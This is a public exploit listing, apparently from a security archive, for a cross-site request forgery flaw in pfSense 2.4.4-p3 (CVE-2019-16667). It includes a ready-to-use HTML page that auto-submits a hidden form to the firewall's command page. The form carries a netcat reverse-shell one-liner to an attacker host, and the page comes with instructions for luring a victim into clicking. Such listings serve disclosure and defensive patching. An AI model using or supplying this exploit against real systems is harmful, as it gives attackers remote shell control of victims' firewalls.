what you don't know can hurt you

pfSense 2.4.4-p3 Cross Site Request Forgery

pfSense 2.4.4-p3 Cross Site Request Forgery
Posted Jul 27, 2020
Authored by ghost_fh

pfSense version 2.4.4-p3 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2019-16667
MD5 | 48e6df6f42b9af150c82ab7fca005e76

pfSense 2.4.4-p3 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
# Date: 2019-09-27
# Exploit Author: ghost_fh
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://www.pfsense.org/download/index.html?section=downloads
# Version: Till 2.4.4-p3
# Tested on: freebsd
# CVE : CVE-2019-16667

# Vulnerability Description :- The pfsense firewall is vulnerable to RCE
# chained with CSRF as it uses `csrf magic` library since it allows to tamper
# the CSRF token values submitted when processing the form requests. Due to
# this flaw, an attacker can exploit this vulnerability by crafting new page
# that contains attacker's controlled input such as a "reverse shell" (eg:
# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
# >/tmp/f`token value) in the form and entice the victims to click
# on the crafted link via social engineering methods. Once the victim clicks
# on the link (try again button in this case), the attacker can take the
# lateral control of the victim's machine and malicious actions can be
# performed on the victim's behalf.

<!DOCTYPE html>
<html>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
<form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST">
<input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="dlPath" value="">
<input type=hidden name="txtPHPCommand" value="">
<input type="hidden" name="submit" value="EXEC">
</form>
</body>
</html>

# Create a malicious page containing the above values and once user clicks on malicious link,
# he will be redirected to https://pfsense_ip/diag_command.php page.
# Victim will be greeted with the "Try again" button.
# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    32 Files
  • 25
    Nov 25th
    9 Files
  • 26
    Nov 26th
    11 Files
  • 27
    Nov 27th
    15 Files
  • 28
    Nov 28th
    9 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close